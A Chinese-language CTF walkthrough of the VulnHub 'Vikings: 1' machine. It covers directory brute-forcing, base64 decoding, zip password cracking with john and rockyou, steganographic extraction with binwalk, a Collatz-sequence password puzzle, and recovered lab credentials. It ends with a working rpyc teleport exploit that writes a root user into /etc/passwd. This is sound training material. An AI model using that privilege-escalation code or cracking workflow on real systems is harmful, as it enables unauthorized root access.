VulnHub靶机渗透实战9-vikings

​本次靶机是CTF风格的靶机。

靶场地址：Vikings: 1 ~ VulnHub

网络呢还是桥接模式。

Description

Back to the Top

A CTF machine with full of challenges

Do what is visible, no rabbit holes

Learn new things, and make sure that you enum first then hack.

Discord- luckythandel#6053 {for any-hint}

This works better with VirtualBox rather than VMware

一；信息收集哇。

1；快速简单方便的发现主机和开放的服务端口。

2；访问一下，很帅。

3；爆破一下子目录。

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.1.60/site/ -x txt,tar.tar.gz,php

4;看一下有没有什么有用的东西。

​

5；将base64编码（最后存在=，猜测应该是base64）的字符串进行解码保存到本地并使用file查看文件类型，获得文件类型为zip

curl http://192.168.1.66/site/war-is-over/ | base64 -d > upfine

​

6；修改后缀，查看一下，需要密码。fcrackzip工具也能用来爆破密码，fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u upfine.zip，但是爆破失败。

那就换一个zip2john。zip2john upfine.zip > paswd

用字典爆破。 john --wordlist=/usr/share/wordlists/rockyou.txt paswd

binwalk -e king --run-as=root

换这个工具查看隐藏信息，然后提取出来，然后提示我们加--run-as=root，之后目录下会多个目录。

​ 

用户名密码：floki/f@m0usboatbuilde7

二；漏洞枚举

1；登录ssh,

2;看看是什么东西。

​编辑​

我是著名的造船师弗洛基。我们竭尽全力袭击了巴黎但还是失败了。战后我们不知道拉格纳在哪。他现在很悲伤。我想向他道歉。

因为是我领导了所有的维京人。我得找到他。他可能在任何地方。

#可打印字符是你的盟友。

#num = 29个质数。

collatz-conjecture (num)

3；考拉兹猜想

collatz-conjecture经过搜索为考拉兹猜想（英语：Collatz conjecture），又称为奇偶归一猜想、3n+1猜想、冰雹猜想、角谷猜想、哈塞猜想、乌拉姆猜想或叙拉古猜想，是指对于每一个正整数，如果它是奇数，则对它乘3再加1，如果它是偶数，则对它除以2，如此循环，最终都能够得到1。通过前面对数列求解的认识，我们可以类似的编写程序。这里判断奇数/偶数可以用求余函数mod，判断可以用if语句，循环终止是数列的某项达到1，可以用while语句。

​

所以boat的意思是让我们对第二十九个质数做考拉兹猜想，所得到的数的数列，其中可打印的字符（ascall可以代表的字符，256以内），就是我们要得到的

首先我们编写一段简单的python代码来计算出第二十九个质数。

n = 0
for i in range(1000):
    flag = 0
    if i < 2:
        continue
    j = int(i/2) + 1
    for k in range(2,j):
        if i % k == 0:
            flag = 1
            break
    if flag == 0:
        n += 1
        print("第",n,"个质数为",i)

再编写一个简单python做考拉兹猜想，并且输出所有ascall为256以内的字符

n = 109
num = []
num.append(n)
while n != 1:
    if n % 2 == 0:
        n =int(n / 2)
    else:
        n= int(3 * n + 1)
    if(n < 256):
        num.append(n)
print(num)
for i in num:
    j = chr(i)
    print(j,end='')

4;使用cyberchef的Strings模块分出所有可打印的字符，因为输出是每个字符占一行所以再用replace模块替换掉换行符方便复制密码，也要掉所有空格.​​

5;所以，ragnar用户的密码是：mR)|>^/Gky[gz=\.F#j5P(

第一个falg.

linux登录自动执行命令，可以通过

1.  对于当前用户生效的
2.  编辑当前主目录下的.bashrc文件添加一个指令
3.  编辑当前主目录下的.profile文件
4.  .bash_profile文件 
5.  对于全局用户生效的
6.  /etc/profile

​ 有一个文件是以root权限运行。通过搜索我们发现这个程序也是一个客户端服务端的程序，并且这个服务端文件的运行用户为root，我们可以通过编写代码向服务端发送特殊请求来获得root用户的shell。

​

1;写shell,调用有root执行rpyc.classic.connect文件的权限，创建一个用户和用户密码，写入shell，然后执行，最后，su sing。哦了！​

import rpyc
def exp():
    import os
    os.system("echo 'sing:$1$tad/je9c$twFkrVbv69ZQt3mPBFrHX1:0:0:root:/root:/bin/bash' >> /etc/passwd")
conn = rpyc.classic.connect("localhost")
fn = conn.teleport(exp)
fn()

​

​

2;提权成功，第二个falg.